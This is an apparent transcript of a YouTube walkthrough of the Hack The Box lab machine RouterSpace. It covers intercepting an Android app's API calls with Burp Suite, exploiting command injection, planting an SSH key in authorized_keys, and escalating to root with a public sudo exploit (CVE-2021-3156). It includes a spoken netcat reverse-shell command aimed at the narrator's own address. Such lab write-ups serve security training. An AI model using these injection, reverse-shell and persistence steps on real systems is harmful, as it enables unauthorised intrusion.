Hey YouTube, welcome back. Hope you all are doing well. This is Mohammad Badruddin and today I am going to solve another machine from Hackthebox. The machine name is RouterSpace and the difficulty level of that machine is easy. So without wasting time, let's just go and solve the machine. But before that, just wanna tell you that this machine is pretty interesting and a bit different because in that machine you have to deal with an APK file, which is an Android application file, and you have to analyze the Android application using some tools and some Android emulators, right? So let's go, and first of all we need to make nmap scan. So nmap space hyphen s capital V for version enumeration, space hyphen s capital C for default scripts, and I'm going to use aggressive scan using space hyphen a switch, and then I'm also gonna use timing template with level 4. Why today I'm not going to make a simple scan with just these two switches? Because once I did that machine and I scanned the target with these two switches only, I just got one port, which is port number 22. So that's why I did aggressive scan, so that I get more ports. Now target IP is 10.10.11.148 and I want to save this scan result in aggressive.nmap. So I already ran the scan to save the time, so I'm just going to show you the scan result, which is here. So as you can see, two ports are open. One is port number 22, which is open, and this port is default for SSH. The second port is port number 80. This is again TCP port. State of this port is open, and this port is also default for HTTP. Now X powered by is RouterSpace, and that's it. Some request ID is there, suspicious activity detected. Okay, so the first thing I'm going to access port number 80 and let's see what we have. So I already accessed port number 80 on this target IP, and as you can see we have one web application or website running saying connect your router with RouterSpace. Okay, and there are some links like home. If you click, it is index.html. You can see it in the bottom of left hand side corner. Rest of the links like features, pricing and contact, these links are dead links. So there is one more link which is saying download, and once I hover my cursor on the download, you can see left side bottom corner there is routerspace.apk file. So let's go more. Mobile transport solution to connect everywhere in the space. So maybe there is an application we will get from this download, routerspace.apk Android application, and with that application we can connect to somewhere, right? Feature that give you real feel, and again there is one download button, and it is also redirecting us to the same APK file. So let's download this. Click it. There is routerspace.apk. Save this file. I already saved this file, so I can show you that file in downloads. Where is download? This is download. Open folder, and you can see routerspace.apk. And I sent this file to my Windows machine because on Windows machine I installed one Windows Android emulator. I also tried Nbox and Android Studio, but once you try to install Nbox Android emulator on the Kali machine, there are many errors and you need to troubleshoot. Finally I troubleshooted, but the thing is it is hard to successfully install and make it work. So the best and very simple and very handy emulator, which is Nox player. So if you go on your browser and if you just type Nox emulator, hit enter, and the very first page you will find here this Nox player faster, smoother, and this is for download for Windows 10. Fine. So I'm going to show you something. ifconfig eth0. this is the Ethernet interface, and the IP of it is 10.127. And now I'm going to take the remote desktop session of my Windows machine. So I'm going to use xfreerdp/u for the username, which is admin, /p for the password, which is 123456. Take care, you should never use very easy password. So I recommend, this is because the testing machine, and you always put a strong password. And the IP of my Windows machine is 10.101. Fine. So just hit enter, and as you can see, we got the machine. Fine. So I already installed this RouterSpace.apk file here. This is not a rocket science. You just need to drag and drop that file from your machine to this emulator, and it will install it automatically. But the important part here is important settings. Like, you need to go to this setting, and you need to go to device, and inside device, now you can see because I already set up. Once you make it fresh installation, you will find here one option which is saying install driver, and that driver is for network bridging. So if I click on this information button, you can see please save network bridging settings and restart the Nox player to activate. So once that driver is installed, okay, you need to restart this Nox player, and then you have to check these two boxes. And as you can see, now it took IP address, which is 192.168.10.144, right? This is the first very important setting. And after it took the IP, your Nox player or your emulator comes into the same network as your machine, right? Now the second point is, you need to make this Android platform or Android operating system also in the network. So for that, go to the tools, come to the settings, go to the Wi-Fi, and this Wi-Fi is connected. So it is also connected, means we are in network. Just go back. Now once I open this RouterSpace, as you can see here, it is same like this application, right? So next, again you see this is same like these two icons, and next and done. So after you make done, there is one button and there is one router. So if you just click on check status, there is a warning which is saying unable to connect the server, right? Check again, unable to connect the server. Fine. Click unable to connect the server. That means it is trying to connect somewhere, but the server is not responding because maybe this request is not going to the server. So what we need to do is, okay, so we need to intercept this request. So there are two ways: whether you install Burp Suite on the same Windows machine, or you can capture its request to the Burp Suite which you have on your Kali machine. So I go to the Burp Suite which I have on Kali machine, because we are on the same network, means this Kali machine and my Windows machine and the emulator, all three are in same network. So I'm going to just edit this interface. Come here, go to the specific address, and then from the drop down you need to choose the IP of the Ethernet, which is here. This is my IP for the Ethernet, right? So choose it and okay. Now go back to the here, and you need to come to the tools, go to the settings, come to the Wi-Fi settings, and you need to long press this so that you get this modify network. Come here, and as you can see, I already configure the proxy IP, means the proxy server IP, to my Kali machine IP, this 10.127 and port number 8080, because I have Burp Suite or proxy running on my Kali machine. So now open it again, next, done, and come here, go to the HTTP history, come here, take this here and just click check status. And as you can see, once we intercept is off. So once I click on check status, we get a hit here and we capture the request. Click on this request, and as you can see, whenever we click on check status button, this application is sending a post request to an API. This is very, very interesting. And now that API actually monitoring router dev check device access. Fine. So I'm going to send this request to the repeater, go to the repeater, and I'm going to play a bit. So first send this request, and as you can see, 200. Okay, but the important thing here is we got /n, which is new line. So instead of before new line, if I try colon, semicolon, and let's say ID, I'm trying for the command injection, send, and once I send, you can see we got the command injection successful. That means this application, this API is vulnerable for command injection. Let's try, if I don't put this, just put that. Okay, we got this. Now I'm going to try some other signs like and. Yeah, that is working. Double and is also working. Fantastic. So let's try few more commands like who am I, and we are Paul. Yeah. Okay, let's try pwd and hit enter, and we are in op www public and RouterSpace. This is interesting. Why? Because normally web directories are in var www, but it is in opt www. So I'm going to put this directory with me, scan ports 22, 80. Fine, I will check this later once I get the response. Now I don't need this. Come back to the burp suite. Okay, now let's try to see which NC, and yeah, netcat is there. So let's try to get reverse shell, nc space -e /bin/bash, and the IP of my machine, clear ifconfig, and let's say tunnel 0. So 10.10.14.2, 10.10.14.2, and on port number 9090. Before hitting enter, nc space -nlvp port number 9090. So I'm listing on it and send it. No response. Maybe we get shell. No, we did not get any shell. Okay, let's see, TCP dump space -i for the interface is gonna be tunnel 0, and I want to capture ICMP traffic, and come back here. Instead of this, I'm gonna say ping space -c 5 request I want to make for ping to 10.10.14.2 to my machine. So this will ping my machine, and if that ping request come up to my machine, we will get a hit here. So send this request again, go back, and we did not get any hit, right? So something is there which is blocking these requests. So now what we need to do is we can do few more things. Come on. Okay, ls space -la. In the home directory, I want to see maybe there is IDRSA key in .ssh. So first of all, I need to make sure whether SSH directory is there or not. So as you can see, this is the first flag we have, and yeah, .ssh directory is there. So I want to see the files in .ssh directory. Send again, and there is no ID RSA key, but because we can execute because we can execute command, so we can create something, touch, and let's say authorized underscore keys file, send 200. That means our request is sent. Let's see now what files inside SSH directory, and now as you can see, authorized keys file is inside this. So now what we need to do is we will test here cat .ssh/idrsa.public key. So I'm going to copy this public key, and here I'm gonna say echo and send this content to authorized file. So just copy this, come here, paste that, and come back here, copy and paste it here within echo, right? Yeah, that's correct. So just send this request. It is going to echo the public ID RSA file, and then send it to actually .ssh/ here in this authorized file. So it will copy the content. Now what we need to see is authorized underscore keys. So I want to see whether our content is saved in that file or copied in that file or not. So send, and yeah, the file is there. Fine. So now we can actually make SSH Paul at 10.10.11.148, hit enter. Hopefully we can connect. And yeah, we connected with SSH to the Paul user. That's fantastic. Now ls space -la, and there is user.text. So cat user.text. Okay, very well. So this is the first flag. Now the second thing is I want to check this directory what we copied here, because the web directory is inside opt www public router space. So cd/opt www/public and inside router space ls space -la. And the interesting thing here is there is node module, and also there is index.js. So let's see, index.js, hit enter, and yeah, this is the code, and as you can see, it's sending the request to the API. So this is the GET request, sending to API version 4 monitoring router dev check device access. But this is not the request what we find in the burp suite, because this is the post request. So let's find out that post request. Yeah, this is the, I think, yeah, this is the request. Now you can, I'm going to copy this and paste that here. Now the command injection vulnerability arises here because of this exec function. So as you can see, after exec, it is saying echo and IP. So after this, if you put here, if you put anything like who am I or something, it is going to execute the command. So this is the problem. Fine. Okay, that's been said. We already actually we already exploited that. Now we need to make some lateral movement and we need to enumerate more in the system. So let's see, net state space hyphen tlpn, hit enter. There is no interesting port. Uname space hyphen a, 5.4.0. okay, is there any other user? Cat slash etc slash passwd. So root who can run bin bash. Okay, we can try like this. So grep bin slash bash from etc passwd. So there are only 2 users. Fine, let's try sudo space hyphen l. No, it's asking for pol password, which we do not have. Try find slash space hyphen permission space hyphen u is equal to s 2 inside def slash null. Let's see. Okay, that seems normal. There is nothing special binary here. Okay, the thing is, we now I'm going to slash dev slash shm ls space hyphen la. Yeah, there is nothing. So I'm going to copy here lin piece and we will automate the enumeration process. So I already have this lin piece in this directory. Come on, ls, and as you can see linpiece.sh is there. Okay, so start the Python web server, python 3 space hyphen m http dot python 3 space hyphen m http dot server on port number 80. Okay, now here let's try wget http colon slash slash 10.10.14.2, which is my IP, and linpiece.sh. It's trying to connect, but it will not connect because something is blocking. As we know that before, once we try to ping and try to make reverse shell connection, we did not get any hit on TCP dump, so that will not work. Come on. So we have another way. We can copy that file through secure copy, means SSH copy. So SCP and the file name which we want to copy, which is linpiece, and then pol at 10.10.11.148, and where we need to copy this file on the target in the dev shm. Hit enter. Up to now it's 0%. It should work. ls space hyphen la here. Yeah, it's copying, but up to now not finished. Yeah, now it's finished. So chmod +x linpiece clear, and let's run linpiece. Clear, make it a bit more bigger so that. Okay, so I'm going to pause the video till it's finished and I will come back once it's finished. Well, as you can see, its linpiece is finished. Now go up, searching password inside logs. There are log files and there is one password, real name, RouterSpace username is this, and password is encrypted password, this one. So no need, go back, go up, and There are database file, but we did not find any database running on the machine, target machine. User.txt, we already find that. Searching root file in home directory, user.txt, we already find out this. So not interesting. Capabilities, interesting files. This is the same result what we find from the find command. Searching Docker file, not interesting. Authorize file, this is the key what we pasted before. And this is very important. And also installed compilers. Why this is so important? You might have heard about land of living, LOL. So this is not that LOL, but land of living is what the installed applications, softwares and compilers on the target machine, which a hacker can weaponize while hacking. Fine. So we can suppose now we know that GCC compiler is on the target machine. So we can use exploit which can be compiled with GCC. Also, we know that okay, on the target machine Perl is there, so we can execute Perl payloads. We can execute Python payloads. Okay, Python 2.7, Python 3, both. So this is important. Okay, go up. Root and Paul. User information we already have. This is netstate space -tlpn, ETH0 interface. Give me something interesting. Cron jobs, which I did not check before, but here nothing interesting. Okay, here is something interesting. So this exploit is CVE 2021-4034 for PwnKit, and this exploit is CVE 2021 3156 sudo baron, same date, and its second version also. So this is interesting for me because I did not check the sudo version. Paste. So maybe the sudo version is vulnerable. I'm gonna clear this. Sudo space -V, hit enter, and sudo version 1.8.31. Yeah, this is vulnerable. Save it. Okay, come here. Let's try sudo 1.8.31 exploit. Enter, and as you can see, there is privilege escalation vulnerability in this version of sudo, and there is exploit or POC. So I already copied this repository in my directory. So ls space -la, and this is the exploit directory which we clone from this git. So now what we need to do is cd sudo ls space -la. We need to send all these files to the target machine, and this exploit is written in C, and we know that C compiler is there. So from the lin piece we know that GCC and C compiler are there, so we can compile that exploit on the target. So for this I'm going to send all the files from the SCP. Star means all the files, Paul at 10.10.11.148 into dev/shm. Hit enter, and it is going to send all those files except .git, because .git was the directory. if I say ls space -la, so you can see it just did not send .get. Rest of the files it's already sent. And if I come here ls space -la, so leave this lin piece, you can see 1 2 3 4, all these 4 files it sent it here. Now we just need to compile this exploit, and we can do it by make. So there is already command in the make file, so it is going to execute these 2 commands. So if I show you cat make file, hit enter, so you can see it will execute. If we execute make command, it is going to execute these 2 commands. So now that command will space -o exploit, it is going to output this in a file which named is exploit. So ls space -la, there is one exploit file. So let's just execute this exploit file. So exploit, hit enter, and boom, id, we are root, and who am I, semicolon, host name, hit enter, root, and root space .htb. Let's go inside the root directory, ls space -la, and as you can see we have here root.txt. So clear, no, it will not clear, just we need to show, we need to access this root.txt, and as you can see this is the root flag. So that's it for this video, and we compromise the whole machine. So if you like the content, please like, subscribe, and share. And if you have any query, you can put your query in the comment section. I will try to reply as soon as possible. See you in the next video. Bye.